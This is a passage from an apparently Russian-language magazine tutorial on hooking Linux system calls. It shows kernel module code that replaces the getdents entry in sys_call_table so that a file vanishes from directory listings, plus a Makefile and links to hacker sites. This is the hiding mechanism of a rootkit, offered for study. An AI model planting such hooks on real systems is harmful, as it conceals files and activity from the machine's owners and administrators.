kfree(dirp2);

}

Возвращаем значение длины записей в каталоге:

return tmp;

}

Функции инициализации и выгрузки модуля имеют стандартный вид:

int init_module(void)

{

orig_getdents=sys_call_table[SYS_getdents];

sys_call_table[SYS_getdents]=own_getdents;

return 0;

}

void cleanup_module()

{

sys_call_table[SYS_getdents]=orig_getdents;

}

Сохраним исходный текст в файле sys_call_getd.c и создадим Makefile следующего содержания:

CC = gcc

module = sys_call_getd.o

CFLAGS = -O3 -Wall

LINUX = /usr/src/linux

MODFLAGS = -D__KERNEL__ -DMODULE -I$(LINUX)/include

sys_call_getd.o: sys_call_getd.c $(CC) -c

$(CFLAGS) $(MODFLAGS) sys_call_getd.c

В текущем каталоге создадим файл our.file и загрузим модуль. Файл исчезает, что и требовалось доказать.

Как вы понимаете, рассмотреть в рамках одной статьи пример перехвата каждого системного вызова не представляется возможным. Поэтому тем, кто заинтересовался данным вопросом, рекомендую посетить сайты:

n  www.phrack.com

n  www.atstake.com

n  www.thehackerschoice.com

Там вы сможете найти более сложные и интересные примеры перехвата системных вызовов. Обо всех замечаниях и предложениях пишите на форум журнала.

При подготовке статьи были использованы материалы сайта http://www.thehackerschoice.com.